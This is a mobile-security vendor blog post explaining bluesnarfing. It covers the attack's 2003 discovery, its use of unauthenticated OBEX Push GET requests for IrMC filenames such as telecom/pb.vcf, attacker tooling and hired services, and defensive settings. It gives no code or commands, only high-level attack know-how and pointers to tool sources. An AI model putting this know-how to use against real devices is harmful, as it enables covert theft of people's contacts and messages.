What is Bluesnarfing?

finjanmobileBlog, Mobile Security

bluesnarfing

Once touted as possibly the greatest thing since sliced bread, wireless Bluetooth technology has since gained a reputation as one of the gaping barriers in mobile and wireless device security – almost as bad as public WiFi.

While it might be harsh to flatly dismiss the wireless technology that makes it possible for the visually or motion-impaired to enjoy the benefits of internet and computer systems or to remotely control motor-driven appliances and machinery, Bluetooth does raise concerns – particularly with its vulnerability to several sorts of attack. One of these is known as bluesnarfing.

Bluesnarfing

Now, Bluetooth is a high-speed but very short-range medium for exchanging data by wireless means between desktop and mobile computers, smartphones, tablets, PDAs (Personal Digital Assistants), and other devices which support the technology.

Bluesnarfing (or a BlueSnarf attack) is a device hack which may be performed when a Bluetooth-capable device is set to “discoverable” mode – when its Bluetooth function is turned on, and the device is able to be located by other compatible devices within range.

It involves the theft of data from a wireless device having a Bluetooth connection – which could include information from contact lists, calendars, emails, or text messages. This theft typically occurs without the user’s knowledge, and so may go on indefinitely unless discovered.

A Shocking Discovery

According to the anecdotal evidence, bluesnarfing first came to light in September 2003, when it was observed by researcher Marcel Holtmann. Adam Laurie of A.L. Digital’s independent investigations of November 2003 discovered the same vulnerability which made bluesnarfing possible, while testing the security of Bluetooth-compatible devices.

Laurie’s publication of a vulnerability disclosure notification on the Bugtraq blog in November 2003 (an attempt to make device manufacturers aware of the problem) was the first occasion on which bluesnarfing became more generally known.

Object Exchange Dynamics

To stage a BlueSnarf attack, a hacker needs to exploit the vulnerabilities present in some deployments of the object exchange (OBEX) protocol, which is widely used to govern the exchange of information between wireless devices. The attacker must connect to the OBEX Push Profile (OPP), a service which typically doesn’t require authentication, and which is optimized for the easy exchange of digital business cards and other objects.

Bluesnarfing then requires the attacker to connect to an OBEX Push target and perform an OBEX GET request for known filenames. These filenames are specified under the IrMC Specification (a standard for wireless data transfer), and include the likes of “telecom/cal.vcs” (for a device calendar) and “telecom/pb.vcf” (for a device phone book).

Once the OBEX protocol has been compromised, a hacker can synchronize their own system with their targeted victim’s device, in a process known as pairing. If the firmware on a device is unsecured or improperly implemented, an attacker may be able to gain access to and steal all the files whose names are either known or guessed correctly. They may also be able to gain access to any services available to the targeted user.

Bluesnarfing to Order

As with so much of the economy of the “Dark Web”, bluesnarfing tools and bespoke services are readily available – if you know where to look.

These resources are accessible to both “black hat” and “white hat” hackers, which is why the first tool to be deployed from the BlueSnarf attacker’s bag of tricks is typically a utility like Bluediving – which is essentially a penetration testing application that probes Bluetooth-compatible devices for OBEX protocol vulnerabilities.

Once a device has been identified as being susceptible to BlueSnarf attacks, the hacker then has a few options:

If they have some programming skills, they can code and compile a complete bluesnarfing attack tool of their own.

They can avail themselves of the code snippets and resources available on a site like BlueJackingTools.com, and customize an attack weapon of their choice.

They can contact an independent bluesnarfing “contractor”, and hire their services or purchase a BlueSnarf attack package from them.

Counter-Measures

What makes bluesnarfing such a concern is that when an attack is under way, the victim can be completely unaware of what’s going on as their high-value data leaks away into cyber-criminal hands – and that short of disabling Bluetooth on your devices altogether, there’s no foolproof way of preventing a BlueSnarf attack.

That said, there are some measures you can take to protect yourself:

On many devices, mobile discovery modes are activated by default. A device will remain susceptible to bluesnarfing attacks, unless this mode is deactivated.

Keeping your phone or other mobile device in “invisible” mode affords some measure of protection against BlueSnarf attacks.

There are anti-bluesnarfing tools available – typically, simple utilities that may be configured to detect any unauthorized Bluetooth connection between your device and those of others nearby. As with the attack tools, these defensive weapons may be found on bluesnarfing resource websites.

Share this Post